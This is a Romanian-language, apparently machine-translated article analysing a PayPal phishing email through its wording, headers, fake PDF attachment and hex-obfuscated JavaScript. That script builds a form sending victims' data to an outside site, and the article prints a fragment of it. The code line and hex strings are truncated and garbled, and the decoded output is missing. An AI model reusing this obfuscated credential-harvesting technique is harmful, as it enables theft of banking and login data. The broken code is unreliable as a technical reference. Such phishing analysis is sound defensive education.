Securitate online: defalcarea anatomiei unui e-mail de phishing

În lumea de astăzi, în care informațiile tuturor sunt online, phishing-ul este unul dintre cele mai populare și devastatoare atacuri online, deoarece poți oricând să cureți un virus, dar dacă îți sunt furate detaliile bancare, ai probleme. Iată o detaliere a unui astfel de atac pe care l-am primit.

Nu credeți că doar detaliile dvs. bancare sunt importante: la urma urmei, dacă cineva obține controlul asupra autentificarii contului dvs., nu numai că cunoaște informațiile conținute în acel cont, dar șansele sunt ca aceleași informații de conectare să poată fi utilizate în diferite alte părți. conturi. Și dacă vă compromit contul de e-mail, vă pot reseta toate celelalte parole.

Așadar, pe lângă păstrarea parolelor puternice și variate, trebuie să fii mereu în căutarea e-mailurilor false care se mascadă drept lucru real. În timp ce majoritatea phishing încercările sunt amatorice, unele sunt destul de convingătoare, așa că este important să înțelegem cum să le recunoaștem la nivel de suprafață, precum și cum funcționează sub capotă.

LEGATE DE: De ce se scrie phishing cu „ph?” Un improbabil omagiu

Imagine de asirap

Examinând ceea ce este la vedere

Exemplul nostru de e-mail, la fel ca majoritatea încercărilor de phishing, vă informează cu privire la activitatea din contul dvs. PayPal care, în circumstanțe normale, ar fi alarmantă. Prin urmare, îndemnul este să vă verificați/restaurați contul trimițând aproape fiecare informație personală la care vă puteți gândi. Din nou, aceasta este destul de formulă.

Deși există cu siguranță excepții, aproape fiecare e-mail de phishing și înșelătorie este încărcat cu semnale roșii direct în mesajul propriu-zis. Chiar dacă textul este convingător, puteți găsi de obicei multe greșeli presărate în corpul mesajului, care indică faptul că mesajul nu este legitim.

Corpul mesajului

La prima vedere, acesta este unul dintre cele mai bune e-mailuri de phishing pe care le-am văzut. Nu există greșeli de ortografie sau gramaticale, iar verbiajul se citește în funcție de ceea ce v-ați putea aștepta. Cu toate acestea, există câteva semnale roșii pe care le puteți vedea atunci când examinați conținutul puțin mai atent.

• Paypal – cazul corect este PayPal (P majusculă). Puteți vedea că ambele variante sunt utilizate în mesaj. Companiile sunt foarte deliberate cu brandingul lor, așa că este îndoielnic că așa ceva ar trece procesul de verificare.
• permiteți ActiveX – De câte ori ați văzut o afacere legitimă bazată pe web de dimensiunea Paypal folosind o componentă proprietară care funcționează doar pe un singur browser, mai ales când acceptă mai multe browsere? Sigur, undeva acolo o companie o face, dar acesta este un steag roșu.
• în siguranță. – Observați cum acest cuvânt nu se aliniază în marjă cu restul textului paragrafului. Chiar dacă întind un pic mai mult fereastra, nu se înfășoară sau nu se spațiează corect.
• Paypal! – Spațiul dinaintea semnului exclamării pare ciudat. Doar o altă ciudație care sunt sigur că nu ar fi într-un e-mail legitim.
• PayPal- Account Update Form.pdf.htm – De ce ar atașa Paypal un PDF mai ales atunci când ar putea să facă link la o pagină de pe site-ul lor? În plus, de ce ar încerca să mascheze un fișier HTML ca PDF? Acesta este cel mai mare steag roșu dintre toți.

Antetul mesajului

Când aruncați o privire la antetul mesajului, mai apar câteva semnale roșii:

• Adresa de la de la test@test.com .
• Adresa la adresa lipsește. Nu am eliminat acest lucru, pur și simplu nu face parte din antetul standard al mesajului. De obicei, o companie care are numele dvs. vă va personaliza e-mailul.

Atașamentul

Când deschid atașamentul, puteți vedea imediat că aspectul nu este corect, deoarece lipsesc informații despre stil. Din nou, de ce ar trimite PayPal prin e-mail un formular HTML când ar putea pur și simplu să vă ofere un link pe site-ul lor?

Notă: am folosit vizualizatorul de atașamente HTML încorporat din Gmail pentru aceasta, dar vă recomandăm să NU DESCHIDEȚI atașamentele de la escroci. Nu. Vreodată. Foarte des conțin exploit-uri care vor instala troieni pe computer pentru a vă fura informațiile contului.

Derulând mai mult în jos, puteți vedea că acest formular solicită nu numai informațiile noastre de conectare PayPal, ci și informații bancare și carduri de credit. Unele imagini sunt sparte.

Este evident că această încercare de phishing are ca rezultat totul dintr-o singură lovitură.

Defalcarea tehnică

Deși ar trebui să fie destul de clar pe baza a ceea ce este la vedere că aceasta este o încercare de phishing, acum vom analiza structura tehnică a e-mailului și vom vedea ce putem găsi.

Informații din atașament

Primul lucru la care trebuie să aruncați o privire este sursa HTML a formularului de atașare, care este cea care trimite datele pe site-ul fals.

Când vizualizați rapid sursa, toate linkurile par valide, deoarece indică fie paypal.com, fie paypalobjects.com, care sunt ambele legitime.

Acum vom arunca o privire la câteva informații de bază ale paginii pe care Firefox le adună pe pagină.

După cum puteți vedea, unele dintre elementele grafice sunt extrase din domeniile blessedtobe.com, goodhealthpharmacy.com și pic-upload.de în loc de domeniile PayPal legitime.

Informații din anteturile de e-mail

În continuare, vom arunca o privire asupra antetelor mesajelor de e-mail brute. Gmail face acest lucru disponibil prin opțiunea de meniu Afișare originală din mesaj.

Privind informațiile din antetul mesajului original, puteți vedea că acest mesaj a fost compus folosind Outlook Express 6. Mă îndoiesc că PayPal are pe cineva în personal care trimite fiecare dintre aceste mesaje manual printr-un client de e-mail învechit.

Acum uitându-ne la informațiile de rutare, putem vedea adresa IP atât a expeditorului, cât și a serverului de e-mail de retransmitere.

Adresa IP a utilizatorului este expeditorul original. Făcând o căutare rapidă a informațiilor IP, putem vedea că IP-ul de trimitere este în Germania.

Și când ne uităm la adresa IP a serverului de corespondență (mail.itak.at), putem vedea că acesta este un ISP cu sediul în Austria. Mă îndoiesc că PayPal își direcționează e-mailurile direct printr-un ISP cu sediul în Austria atunci când au o fermă de servere masivă care ar putea face față cu ușurință acestei sarcini.

Unde se duc datele?

Deci am stabilit în mod clar că acesta este un e-mail de phishing și am adunat câteva informații despre de unde provine mesajul, dar cum rămâne cu unde sunt trimise datele dvs.?

Pentru a vedea acest lucru, trebuie mai întâi să salvăm atașamentul HTM pe desktop-ul nostru și să îl deschidem într-un editor de text. Derulând prin el, totul pare să fie în ordine, cu excepția cazului în care ajungem la un bloc Javascript cu aspect suspect.

Dezvăluind sursa completă a ultimului bloc de Javascript, vedem:

// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
var i, y, x = 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e; y =, pentru (i = 0; i

De fiecare dată când vedeți un șir mare de litere și numere aparent aleatorii încorporate într-un bloc Javascript, este de obicei ceva suspect. Privind codul, variabila x este setată la acest șir mare și apoi decodificată în variabila y. Rezultatul final al variabilei y este apoi scris în document ca HTML.

Deoarece șirul mare este format din numere 0-9 și literele a-f, cel mai probabil este codificat printr-o simplă conversie ASCII în Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e6532672f670e3d22687474703

Se traduce prin:

Nu este o coincidență faptul că aceasta decodifică într-o etichetă de formular HTML validă, care trimite rezultatele nu către PayPal, ci către un site necinstit.

În plus, când vizualizați sursa HTML a formularului, veți vedea că această etichetă de formular nu este vizibilă, deoarece este generată dinamic prin Javascript. Aceasta este o modalitate inteligentă de a ascunde ce face de fapt HTML-ul dacă cineva ar vedea pur și simplu sursa generată a atașamentului (cum am făcut mai devreme), spre deosebire de deschiderea atașamentului direct într-un editor de text.

Rulând un whois rapid pe site-ul ofensator, putem vedea că acesta este un domeniu găzduit la o gazdă web populară, 1and1.

Ceea ce iese în evidență este că domeniul folosește un nume care poate fi citit (spre deosebire de ceva de genul dfh3sjhskjhw.net) și domeniul este înregistrat de 4 ani. Din această cauză, cred că acest domeniu a fost deturnat și folosit ca pion în această încercare de phishing.

Cinismul este o bună apărare

Când vine vorba de a rămâne în siguranță online, nu strica niciodată să ai un pic de cinism.

Deși sunt sigur că există mai multe semnale roșii în exemplul de e-mail, ceea ce am subliniat mai sus sunt indicatori pe care i-am văzut după doar câteva minute de examinare. Ipotetic, dacă nivelul de suprafață al e-mailului ar imita 100% omologul său legitim, analiza tehnică ar dezvălui în continuare adevărata sa natură. Acesta este motivul pentru care este important să puteți examina atât ceea ce puteți vedea, cât și ceea ce nu puteți vedea.

• & rsaquo; Ce ar trebui să faceți dacă primiți un e-mail de phishing?
• & rsaquo; Ar trebui să vă schimbați parolele în mod regulat?
• & rsaquo; Cum să vă testați securitatea antivirus, firewall, browser și software
• & rsaquo; Codurile QR explicate: de ce vezi acele coduri de bare pătrate peste tot
• & rsaquo; 7 moduri de a vă proteja browserul web împotriva atacurilor
• & rsaquo; Symantec spune că software-ul antivirus este mort, dar ce înseamnă asta pentru tine?
• & rsaquo; Ce este un server de comandă și control pentru malware?
• › Funcții vs. Formule în Microsoft Excel: Care este diferența?